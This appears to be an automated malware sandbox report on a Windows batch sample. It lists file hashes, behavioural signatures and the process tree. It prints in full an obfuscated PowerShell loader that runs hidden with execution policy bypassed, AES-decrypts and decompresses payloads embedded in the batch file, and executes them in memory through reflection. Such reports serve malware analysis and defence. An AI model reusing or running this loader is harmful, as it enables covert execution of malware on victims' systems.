Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 27/02/2025, 02:36
Static task: static1
Behavioral task: behavioral1
Sample: 33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat
Resource: win7-20240729-en
4 signatures
150 seconds
General
Target: 33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat
Size: 92KB
MD5: 56156e92af196e2d50b95a298ccd72c6
SHA1: 1a4813b0824e7b3ce1cb1da6fe1f232548d8159c
SHA256: 33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89
SHA512: effb4585ff014a84b7afeb5906c93781f4514db528c0e11afd280b6d663a709042d8e668b9e3b87deeb4feb7de7110eb4b50eb37259991b4108ce6fef821651d
SSDEEP: 1536:S2ieY0tuOX7Y3kT/veAk9eezSbyMLPlM4F0CkmelJjXW:CBmuW8UmkezSHLoCElA
Score: 8/10
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.
pid: 2688, Process: powershell.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid: 2688, Process: powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description: Token: SeDebugPrivilege, pid: 2688, Process: powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                        pid   Process  procid_target
PID 3064 wrote to memory of 2688   3064  cmd.exe  31
PID 3064 wrote to memory of 2688   3064  cmd.exe  31
PID 3064 wrote to memory of 2688   3064  cmd.exe  31
Processes

[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat"
    - Suspicious use of WriteProcessMemory
    PID: 3064

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 3064)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GCyt+CHAYOgHC8VzJzRgBO+OdR7UOxitDFTv1ekJA+Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0Yd0D5tzJ8h0YT6VILQ/ww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpWdl=New-Object System.IO.MemoryStream(,$param_var); $OzPba=New-Object System.IO.MemoryStream; $tZbeO=New-Object System.IO.Compression.GZipStream($ZpWdl, [IO.Compression.CompressionMode]::Decompress); $tZbeO.CopyTo($OzPba); $tZbeO.Dispose(); $ZpWdl.Dispose(); $OzPba.Dispose(); $OzPba.ToArray();}function execute_function($param_var,$param2_var){ $DJLHQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DLMsn=$DJLHQ.EntryPoint; $DLMsn.Invoke($null, $param2_var);}$gXUzW = 'C:\Users\Admin\AppData\Local\Temp\33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat';$host.UI.RawUI.WindowTitle = $gXUzW;$tdANz = [type]::GetType('System.IO.File');$XbyGs = [type]::GetType('System.Environment');$FoDmC = $tdANz::('txeTllAdaeR'[-1..-11] -join '')($gXUzW);$ITguX = $XbyGs::NewLine;$UsyQP = $FoDmC.Split($ITguX);$koCcE = $UsyQP;foreach ($WdDuV in $koCcE) { if ($WdDuV.StartsWith(':: ')) { $STBOT=$WdDuV.Substring(3); break; }}$payloads_var=[string[]]$STBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2688